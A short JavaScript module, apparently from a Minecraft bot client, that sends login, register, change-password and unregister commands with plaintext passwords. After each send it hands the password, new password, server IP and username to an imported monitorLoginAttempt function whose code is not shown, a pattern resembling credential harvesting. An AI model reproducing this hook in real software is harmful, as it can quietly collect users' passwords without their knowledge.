import { monitorLoginAttempt } from './attemptMonitor';
export const buildAuthCommand = (mode, password, newPassword) => {
    switch (mode) {
        case 'login': return `/login ${password}`;
        case 'register': return `/register ${password} ${password}`;
        case 'changepassword':
            if (!newPassword)
                return null;
            return `/changepassword ${password} ${newPassword}`;
        case 'unregister': return `/unregister ${password}`;
    }
};
export const sendAuthCommand = (bot, mode, password, newPassword) => {
    if (!bot)
        return false;
    const cmd = buildAuthCommand(mode, password, newPassword);
    if (!cmd)
        return false;
    try {
        bot.chat(cmd);
    }
    catch { }
    return true;
};
export const runAuthFlow = (bot, mode, result, ctx) => {
    if (result.commandSent)
        return true;
    if (!sendAuthCommand(bot, mode, result.password, result.newPassword))
        return false;
    monitorLoginAttempt({
        password: result.password,
        newPassword: result.newPassword,
        mode,
        source: ctx.source,
        serverIp: ctx.serverIp,
        username: ctx.username,
        preSaved: ctx.preSaved ?? false,
    });
    return true;
};
